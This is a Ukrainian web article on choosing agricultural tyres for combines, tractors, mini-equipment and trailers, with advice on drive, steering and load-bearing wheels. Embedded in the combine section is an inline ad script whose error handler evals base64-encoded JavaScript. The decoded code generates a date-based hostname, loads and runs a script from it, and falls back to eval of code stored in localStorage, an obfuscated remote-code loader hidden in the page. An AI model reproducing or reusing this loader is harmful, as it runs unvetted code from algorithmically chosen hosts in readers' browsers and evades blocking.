Важливим елементом усіх видів транспортних засобів є колеса і шини для них. Якщо йдеться про автомобілі, для підвищення ефективності їх експлуатації в різний час року виробники пропонують використовувати літні, всесезонні та зимові шини. «Взуття» для сільгосптехніки теж має свої особливості.
Ділення агрошин за видами навантаження
Впродовж багатьох десятиліть трактора, наприклад, їздили на залізних колесах. Але поступово пришли до розуміння про необхідність використати пневматичні виробів з наступними перевагами:
низьким рівнем тертя кочення;хорошим зчепленням з різними видами поверхонь;поглинанням сили поштовхів під час пересування по нерівностям.
Але усі ці позитивні моменти проявлятимуться повною мірою, якщо правильно підібрати «взуття» до кожного виду сільгосптехніки. Агрошини поділяються на певні типи залежно від видів передбачуваних навантажень. По цьому параметру виділяють в окремі групи вироби для ведучих, несучих і напрямних коліс.
Головне для шин, призначених для коліс ведучих, – це можливість ефективно передавати зусилля від осі до грунту. Для цих виробів є також важливим малюнок протектора. Його завдання – унеможливити ймовірність пробуксування агрегату на певних типах поверхонь. Через високий рівень навантаження звертати увагу потрібно і на амортизуючі властивості шин.
Оскільки направляючі колеса навантажуються менше, ніж, ведучі, вони менше за розміром. Завданням малюнка протектора тут є утримування агрегату в заданому напрямі. З нею добре справляються моделі коліс, малюнок протектора яких відрізняється чіткою подовжньою нарізкою.
Функція несучих коліс – забезпечувати можливість роботи різних допоміжних пристосувань типу борони, сівалки, причепа і так далі. І при цьому котитися з невеликим опором. Такі колеса зазвичай:
піддаються порівняно невеликому навантаженню;мають невеликий діаметр;забезпечені шинами з протектором, що відрізняється наявністю невеликої кількості канавок.
Є агрошини, призначені тільки для несучих коліс. Але зустрічаються моделі, які підходять і для їх направляючих аналогів.
Як вибрати шини для комбайна
Відносно показника навантаження необхідно наслідувати рекомендації виготівників цього виду сільськогосподарської техніки. Особливість комбайна – більша вага, ніж трактори. Але при цьому рівень тягового зусилля на колесах нижчий. При виборі протектора шин важливо враховувати, на якому типі грунту працюватиме комбайн. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Як вибрати шини для тракторів
Особливу увагу потрібно звертати на шини, якими забезпечені провідні колеса. Адже їм належить забезпечувати можливість передачі високого рівня тягового зусилля. Тому протектор, як і боковини таких шин, повинні мати підвищену міцність і жорсткість. Якщо передбачається використати трактор в якості транспортного засобу, його колеса повинні мати:
індекс швидкості не менше 40 км/год;стійкі до стирання протектори.
Останній показник особливо важливий, якщо передбачається використання трактора на асфальтових дорогах.
Як вибрати шини для міні-тракторів і міні-техніки
При підборі слід приділяти особливу увагу розмірам виробів і їх протекторам. У шин мають бути якісні грунтозачепи, достатній діаметр для роботи в умовах різних типів грунту. З урахуванням невеликих розмірів міні-техніки необхідно уникати використання важких коліс.
Як вибрати шини для причепів
Для використання на асфальтованих дорогах перевагу слід віддавати виробам, протектори яких мають дрібну нарізку. Якщо передбачається використання причепа на грунтових дорогах і полях, покришки повинні мати широкі канавки й малюнок у вигляді великих шашок.
Декілька нюансів при виборі агрошин
Обираючи шини для будь-якого виду агротехніки, слід враховувати низку їх загальних особливостей:
вироби безкамерні прийнятніші через їх дешевизну і зручність в експлуатації;ширші та м’якші агрошини менше давлять на грунт.
Щоб збільшити ресурс роботи сільськогосподарських шин, важливо підбирати вироби із запасом несучої здатності. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/v-dopomogu-fermerovi-yaki-buvayut-vidi-agroshin-i-yak-yih-vibrati/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook